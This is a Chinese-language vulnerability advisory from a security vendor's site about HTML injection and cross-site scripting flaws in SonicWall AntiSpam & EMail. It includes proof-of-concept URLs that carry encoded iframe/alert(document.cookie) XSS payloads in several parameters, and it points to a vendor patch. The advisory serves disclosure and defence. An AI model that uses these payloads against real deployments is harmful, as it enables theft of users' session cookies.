安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
SonicWall AntiSpam & EMail多个HTML注入和跨站脚本执行漏洞
发布日期:
2012-08-14
更新日期:
2012-09-19
受影响系统:
SonicWALL AntiSpam & EMail
描述:
BUGTRAQ ID:
55590
SonicWall AntiSpam & EMail是电子邮件解决方案。
SonicWall AntiSpam & EMail 7.3.5.6379及其他版本存在多个HTML注入和跨站脚本执行漏洞,成功利用后可允许攻击者提供的HTML和脚本代码在受影响浏览器中运行,窃取Cookie身份验证凭证,跨站站点外观。
<*来源:Benjamin Kunz Mejri
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Benjamin Kunz Mejri ()提供了如下测试方法:
http://www.example.com/virus_config.html
http://www.example.com/policy_approval_box_summary.html
http://www.example.com/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://www.example.com/alert_history.html[POST
REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://www.example.com/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
建议:
厂商补丁:
SonicWALL
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sonicwall.com
浏览次数:
2223
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客